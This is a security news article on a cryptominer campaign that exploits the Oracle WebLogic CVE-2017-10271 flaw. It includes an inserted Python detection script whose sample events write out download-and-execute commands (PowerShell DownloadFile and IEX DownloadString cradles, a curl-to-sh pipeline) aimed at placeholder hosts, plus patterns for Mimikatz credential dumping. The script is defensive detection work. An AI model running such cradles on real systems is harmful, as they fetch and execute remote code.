
Cryptominer campaign leveraging Oracle bug spreads worldwide via multiple infection tactics


A malicious campaign that's been exploiting a vulnerability in Oracle's WebLogic application servers in order to install a Monero cryptominer on victims' machines has reportedly used at least four different infection chain tactics to spread the threat worldwide, across virtually all industry sectors.

The campaign has already impacted organizations in the U.S., Australia, Hong Kong, India, Malaysia, the U.K., and Spain, according to a Feb. 15 blog post authored by FireEye researchers Rakesh Sharma, Akhil Reddy, and Kimberly Goody.

The bug, CVE-2017-10271, is a remote code execution vulnerability that also affects PeopleSoft HR and Oracle E-Business Suite software. And while it was patched late last year, server owners who have failed to apply the patch remain vulnerable to the exploit, which FireEye reports can result in a cryptominer infection, executed via one of at least four separately observed tactics.

One method uses PowerShell to download the miner directly onto a victimized system, and ShellExecute to execute the program. Alternatively, the exploit can deliver a PowerShell script that downloads the miner from a remote server. For machines operating on Linux OS, there is another possibility: the exploit may deliver shell scripts that download and execute the cryptominer. And a fourth tactic utilizes dumped Windows credentials, the credentials-extracting tool Mimikatz, and the EternalBlue Windows SMB server exploit to spread laterally.
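The four tactics above share one observable trait from a defender's seat: the WebLogic server process spawns a command interpreter that fetches and runs something from the network. The following checker, written for this article as an added example (it is not FireEye's or SC Media's code, and nothing here is a real indicator from the campaign), triages constructed process-creation events for that pattern. It assumes a Sysmon-style event shape with `parent_image`, `image` and `command_line` fields, assumes WebLogic runs under a `java`/`java.exe` process, and uses `placeholder.invalid` hosts in the sample data.

```python
"""Flag WebLogic-spawned download-and-execute behaviour in process-creation logs.

Added example; field names, parent-process assumption and sample events are
constructed for illustration and are not drawn from the FireEye report.
"""
import re

# Assumption: the WebLogic server runs as a Java process.
WEBLOGIC_PARENTS = {"java", "java.exe"}

# Interpreters the article names as the first stage on Windows and Linux.
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "sh", "bash"}

# Download-cradle and credential-dumping indicators (case-insensitive).
INDICATORS = {
    "powershell_download": re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b", re.I),
    "linux_download": re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b", re.I),
    "credential_dump": re.compile(r"mimikatz|sekurlsa", re.I),
}


def _basename(path):
    """Last path component, lower-cased, for either Windows or POSIX separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def classify_event(event):
    """Return the list of indicator names matched by one event ([] when clean)."""
    parent = _basename(event.get("parent_image", ""))
    child = _basename(event.get("image", ""))
    cmdline = event.get("command_line", "")
    hits = []
    if parent in WEBLOGIC_PARENTS and child in SUSPICIOUS_CHILDREN:
        hits.append("weblogic_spawned_interpreter")
    for name, pattern in INDICATORS.items():
        if pattern.search(cmdline):
            hits.append(name)
    return hits


def triage(events):
    """Score each event: high = WebLogic child plus a payload indicator,
    medium = WebLogic child alone or any credential-dump indicator,
    low = a download cradle outside the WebLogic context."""
    findings = []
    for idx, ev in enumerate(events):
        hits = classify_event(ev)
        if not hits:
            continue
        spawned = "weblogic_spawned_interpreter" in hits
        payload = any(h in hits for h in ("powershell_download", "linux_download", "credential_dump"))
        if spawned and payload:
            severity = "high"
        elif spawned or "credential_dump" in hits:
            severity = "medium"
        else:
            severity = "low"
        findings.append({"index": idx, "severity": severity, "hits": hits})
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # Windows: WebLogic spawns PowerShell that downloads a file -> high
        "parent_image": r"C:\Oracle\Middleware\jdk\bin\java.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://placeholder.invalid/p.exe','C:\Windows\Temp\p.exe')",
    },
    {   # Linux: WebLogic spawns sh running a curl-to-shell pipeline -> high
        "parent_image": "/opt/oracle/jdk/bin/java",
        "image": "/bin/sh",
        "command_line": "sh -c 'curl -s http://placeholder.invalid/x.sh | sh'",
    },
    {   # Benign admin activity -> no finding
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell Get-Process",
    },
    {   # WebLogic spawns cmd with no download -> medium (worth a look)
        "parent_image": r"C:\Oracle\Middleware\jdk\bin\java.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": "cmd /c dir",
    },
    {   # Download cradle outside WebLogic context -> low
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/s.ps1')",
    },
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The parent-child relationship carries most of the signal: a production WebLogic instance has little reason to launch PowerShell, cmd or sh at all, so even the "medium" case without a download cradle deserves a look. The regex indicators are deliberately narrow and would need tuning against a real environment's baseline.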

The campaign appears to be similar to one that was reported last month by Morphus Labs' Chief Research Officer Renato Marinho and SANS Technology Institute Dean of Research Johannes Ullrich, who said the same Oracle bug was used to deliver the XMRig cryptominer.

"There were multiple campaigns that leveraged the CVE-2017-10271 to subsequently distribute cryptocurrency miners. In this sense, [our blog post] wasn't specific to a singular campaign, but rather a more cohesive look at the different tactics that we observed following exploitation of that vulnerability," said FireEye senior analyst Kimberly Goody in an email interview today with SC Media. "With that said, based on a quick review of the indicators in the SANS blog, those campaigns appear to be different from activity sets that we were specifically referring to. We still are observing threat actors leverage CVE-2017-10271 to subsequently download cryptocurrency mining payloads as of a few hours ago."

Bradley Barth

As director of multimedia content strategy at CyberRisk Alliance, Bradley Barth develops content for online conferences, webcasts, podcasts, and video/multimedia projects — often serving as moderator or host. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.
